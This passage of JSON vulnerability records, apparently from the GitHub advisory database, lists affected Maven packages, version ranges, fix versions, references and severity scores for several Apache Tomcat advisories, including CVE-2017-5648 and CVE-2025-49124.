"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31650" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/1eef1dc459c45f1e421d8bd25ef340fc1cc34edc" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/40ae788c2e64d018b4e58cd4210bb96434d0100d" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/75554da2fc5574862510ae6f0d7b3d78937f1d40" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8cc3b8fb3f2d8d4d6a757e014f19d1fafa948a60" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b7674782679e1514a0d154166b1d04d38aaac4a9" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b98e74f517b36929f4208506e5adad22cb767baa" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/cba1a0fe1289ee7f5dd46c61c38d1e1ac5437bff" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ded0285b96b4d3f5560dfc8856ad5ec4a9b50ba9" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f619e6a05029538886d5a9d987925d573b5bb8c2" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/j6zzk0y3yym9pzfzkq5vcyxzz0yzh826" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/04/28/2" } ], "database_specific": { "cwe_ids": [ "CWE-459", "CWE-460" ], "github_reviewed": true, "github_reviewed_at": "2025-04-29T14:59:22Z", "nvd_published_at": "2025-04-28T20:15:20Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3vx3-xf6q-r5xp", "published": "2022-05-13T01:25:13Z", "modified": "2024-04-18T17:16:06.618052Z", "aliases": [ "CVE-2017-5648" ], "summary": "Exposure of Resource to Wrong Sphere in Apache Tomcat", "details": "While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.0.M18" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0.M17", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.13" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.2", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.12", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.0.42" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.5", "8.0.8", "8.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.0.41", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.76" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.8" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.75", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.0.M18" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0.M17", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.13" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.2", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.12", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.0.42" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.5", "8.0.8", "8.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.0.41", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.76" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.8" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.75", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5648" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0f7b9465d594b9814e1853d1e3a6e3aa51a21610" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/6bb36dfdf6444efda074893dff493b9eb3648808" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/dfa40863421d7681fed893b4256666491887e38c" }, { "type": "WEB", "url": "https://github.com/apache/tomcat80/commit/6d73b079c55ee25dea1bbd0556bb568a4247dacd" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d0e00f2e147a9e9b13a6829133092f349b2882bf6860397368a52600%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d0e00f2e147a9e9b13a6829133092f349b2882bf6860397368a52600@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/201705-09" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180614-0001" }, { "type": "WEB", "url": "https://web.archive.org/web/20170417124117/http://www.securityfocus.com/bid/97530" }, { "type": "WEB", "url": "https://web.archive.org/web/20170420115120/http://www.securitytracker.com/id/1038220" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1809" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1802" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1801" }, { "type": "WEB", "url": "http://www.debian.org/security/2017/dsa-3842" }, { "type": "WEB", "url": "http://www.debian.org/security/2017/dsa-3843" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2020/07/20/8" } ], "database_specific": { "cwe_ids": [ "CWE-668" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T13:57:54Z", "nvd_published_at": "2017-04-17T16:59:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-42wg-hm62-jcwg", "published": "2025-06-16T15:32:28Z", "modified": "2025-10-29T16:13:33.340454Z", "aliases": [ "BIT-tomcat-2025-49124", "CVE-2025-49124" ], "summary": "Apache Tomcat installer for Windows has an untrusted search path vulnerability", "details": "Untrusted Search Path vulnerability in Apache Tomcat installer for Windows. During installation, the Tomcat installer for Windows used icacls.exe without specifying a full path.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0 through 10.1.41, from 9.0.23 through 9.0.105.\n\nUsers are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.23" }, { "fixed": "9.0.106" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.23" }, { "fixed": "9.0.106" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.23" }, { "fixed": "9.0.106" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } } ], "references": [ { "type": 